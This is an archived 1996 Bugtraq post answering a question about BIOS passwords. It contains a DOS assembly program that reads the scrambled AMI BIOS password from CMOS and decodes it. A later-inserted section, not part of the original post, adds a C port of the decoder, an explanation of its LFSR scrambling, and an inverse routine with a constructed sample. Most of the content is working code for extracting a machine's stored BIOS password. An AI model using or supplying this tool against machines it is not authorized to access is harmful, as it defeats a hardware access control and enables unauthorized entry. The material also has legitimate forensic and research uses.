Bugtraq mailing list archives
Re: BoS: Magic password of some linux-box(Hardware..)
From: rmoar () apertos0 csc UVic CA (Roger Moar)
Date: Thu, 21 Nov 1996 08:36:25 -0800
> Does anyone know if only the Award BIOS is susceptible to this? In other
> words, are other BIOSes, such as AMI BIOS, susceptible to the same sort
> of behavior?
>
> Brian
I don't really remember where I got the following code, but it worked a
few years ago on a 486 machine. If AMI hasn't changed things much, it may
still work.

-Roger.

----------------------------------------------------------------------
; AMiPSW.ASM - Decodes and displays the Ami-Bios-Password!
; coded by mEsCaL/ThE SkeWerS
; v1.1 Toad Hall Tweak, 12 Mar 95
;  - Minor optimizing (just can't resist)
;  - Adding some comments
; David Kirschbaum, Toad Hall

CODE    SEGMENT
        ORG     100h
        ASSUME  CS:CODE,DS:CODE

Start   PROC    NEAR

; <-=-> THiS ONE READS THE ENCRYPTED PASSWORD FROM CMOS <-=->
        mov     cl,'['                  ;Bracket the password v1.1
        call    CharOut                 ;display it v1.1
        cld                             ;insure forward v1.1
        mov     cl,0b7h                 ;CMOS starting address
;v1.1   lea     di,Password
        mov     di,offset Password      ; v1.1
        push    di                      ;save for later v1.1
Read_Password:
        mov     al,cl                   ;CMOS address we want
        out     70h,al
        jmp     $+2                     ;delay a tick
        in      al,71h                  ;Get password char
;v1.1   mov     [di],al                 ;stuff in buffer
;v1.1   inc     di                      ;bump
        stosb                           ;stuff in buffer v1.1
        inc     cl                      ;bump CMOS address
        cmp     cl,0b7h+7               ;done 7 chars yet?
        jnz     Read_Password           ;not yet

; <-=-> NOW, WE HAVE TO DECRYPT CHAR BY CHAR <-=->
;v1.1   lea     di,Password
        pop     di                      ;restore pointer to password v1.1
        and     byte ptr [di],0f0h      ;mask first char
        inc     di                      ;point to next char
Decrypt_Next:
        cmp     di,Offset Password+7    ;hit end?
        jnl     Completed               ;yep
        cmp     byte ptr [di],0         ;current char a 0?
        jz      Completed               ;yep, 0 terminated
        xor     cl,cl                   ;handy 0
        mov     ch,byte ptr [di-1]      ;get previous char
Decrypt:
        inc     cl                      ;build char in CL
        mov     ah,ch                   ;char to decrypt
        xor     dx,dx
        test    ah,10000000b
        jz      NotSet7
        inc     dh
NotSet7:
        test    ah,01000000b
        jz      NotSet6
        inc     dh
NotSet6:
        test    ah,00000010b
        jz      NotSet2
        inc     dh
NotSet2:
        test    ah,00000001b
        jz      NotSet1
        inc     dh
NotSet1:
        add     dl,2
        cmp     dl,dh
        jl      NotSet1                 ;loop
        sub     dl,dh
        shr     ch,1
        cmp     dl,1
        jnz     $+5
        add     ch,80h
        cmp     ch,byte ptr [di]        ;match next char?
        jnz     Decrypt                 ;nope, continue

; <-=-> AND FiNALLY, WE HAVE TO OUTPUT OUR DECRYPTED CHAR <-=->
        mov     ah,2                    ;display char function
        mov     dl,cl                   ;this char
        int     21h
        inc     di                      ;next char
        jmp     Decrypt_Next            ;loop

; <-=-> THAT'S ALL? WELL, THAN LET'S QUiT DiZ SH**! :-) <-=->
Completed:
        mov     cl,']'                  ;Close the bracket v1.1
        call    CharOut                 ;display it v1.1
        mov     ax,4c00h                ;terminate, ERRORLEVEL 0
        int     21h
Start   ENDP

;v1.1 New function: enter with char to display in CL
CharOut PROC    NEAR                    ;v1.1
        mov     ah,2                    ;display char function
        mov     dl,cl                   ;this char
        int     21h
        ret
CharOut ENDP

;Password DB 6 DUP (?)
Password label byte                     ;dynamic buffer v1.1

CODE    ENDS
        END     Start

-- 
Roger Moar -- rmoar () csr uvic ca | http://apertos0.csc.uvic.ca/~rmoar
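The listing's inner loop is easier to read in C than in the assembly, so here is the same descrambling written as an added example (mine, not part of Roger's post or of AMI's code). The Decrypt loop counts set bits in bits 7, 6, 1 and 0 of the running byte, shifts it right and feeds the parity back in as the new top bit, which is an 8-bit Fibonacci LFSR; each password character is simply the number of LFSR steps needed to get from the previous stored byte to the next one. The C version takes the seven bytes as a buffer instead of banging port 70h/71h, so it can be run against a CMOS dump. Two caveats worth knowing before trusting a dump: on a standard MC146818-style RTC, bit 7 of the index written to port 70h is the NMI-disable flag, so the listing's 0b7h..0bdh actually selects CMOS bytes 37h..3Dh with NMI masked; and the assembly spins forever if a stored byte is never reached (CL wraps at 256), e.g. when the masked first byte is zero, so the C decoder bounds the search at the LFSR's 255-step period and reports failure. The ami_scramble() routine is my inverse of the search, labelled as an assumption and used only to build the constructed sample input; the sample password and first byte are made up.

```c
/* Added example (not from the original post): C version of the
 * AMiPSW.ASM descrambling loop, operating on a 7-byte CMOS buffer. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define AMI_PW_BYTES  7                 /* the listing reads 7 CMOS bytes   */
#define AMI_PW_MAXLEN (AMI_PW_BYTES - 1) /* byte 0 is only a seed, masked   */

/* One iteration of the listing's Decrypt loop: parity of bits 7,6,1,0
 * becomes the new MSB after a right shift (LFSR, x^8+x^7+x^6+x+1). */
uint8_t ami_step(uint8_t b)
{
    unsigned ones = ((b >> 7) & 1) + ((b >> 6) & 1) + ((b >> 1) & 1) + (b & 1);
    return (uint8_t)((b >> 1) | ((ones & 1) << 7));
}

/* Decode cmos[] into out. Each character is the number of ami_step()
 * applications that carry the previous stored byte onto the current one.
 * Returns the password length, or -1 if a byte is unreachable (where the
 * assembly would loop forever) or out is too small. */
int ami_decode(const uint8_t cmos[AMI_PW_BYTES], char *out, size_t outlen)
{
    uint8_t prev = cmos[0] & 0xF0;      /* 'and byte ptr [di],0f0h' */
    size_t n = 0;

    for (size_t i = 1; i < AMI_PW_BYTES; i++) {
        uint8_t target = cmos[i];
        if (target == 0)                /* zero-terminated, as in the listing */
            break;
        uint8_t state = prev;
        int count = 0;
        do {
            if (count == 255)           /* full LFSR period tried: unreachable */
                return -1;
            state = ami_step(state);
            count++;
        } while (state != target);
        if (n + 1 >= outlen)
            return -1;
        out[n++] = (char)count;
        prev = target;                  /* listing reloads CH from [di-1] */
    }
    out[n] = '\0';
    return (int)n;
}

/* Inverse of ami_decode (my assumption about the forward direction, used
 * here only to construct sample input). first is the raw seed byte; only
 * its high nibble matters. */
void ami_scramble(const char *pw, uint8_t first, uint8_t cmos[AMI_PW_BYTES])
{
    memset(cmos, 0, AMI_PW_BYTES);
    cmos[0] = first;
    uint8_t state = first & 0xF0;
    for (size_t i = 0; i < AMI_PW_MAXLEN && pw[i]; i++) {
        for (int k = 0; k < (uint8_t)pw[i]; k++)
            state = ami_step(state);
        cmos[i + 1] = state;
    }
}

int main(void)
{
    /* Constructed sample: bytes the password "PASS" would leave behind
     * with a (made-up) seed byte of 0xF5. */
    uint8_t cmos[AMI_PW_BYTES];
    char pw[AMI_PW_MAXLEN + 1];

    ami_scramble("PASS", 0xF5, cmos);
    printf("stored bytes:");
    for (int i = 0; i < AMI_PW_BYTES; i++)
        printf(" %02X", cmos[i]);
    printf("\n");

    if (ami_decode(cmos, pw, sizeof pw) < 0)
        printf("[unreachable byte: not laid out like the listing expects]\n");
    else
        printf("[%s]\n", pw);           /* prints [PASS] */
    return 0;
}
```

Because the feedback polynomial is primitive, every nonzero state cycles through all 255 nonzero values, so the step count is unambiguous for any character code 1..255; only a zero seed nibble (or a corrupted dump) produces the unreachable case.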
Current thread:
- Re: BoS: Magic password of some linux-box(Hardware..) Brian F. Knoll (Nov 20)
- Re: BoS: Magic password of some linux-box(Hardware..) Roger Moar (Nov 21)
- BoS: Magic password of some linux-box(Hardware..) (fwd) sameer (Nov 21)
- SGI Security Advisory 19961102 - FLEXlm and LicenseManager SGI Security Coordinator (Nov 21)
- SGI Security Advisory 19961103 - Sendmail Daemon Mode SGI Security Coordinator (Nov 21)
- CERT Advisory CA-96.24 - Sendmail Daemon Mode Vulnerability CERT Advisory (Nov 21)
- L0pht Kerberos Advisory sameer (Nov 22)
- <Possible follow-ups>
- Re: BoS: Magic password of some linux-box(Hardware..) Eugene Bradley (Nov 20)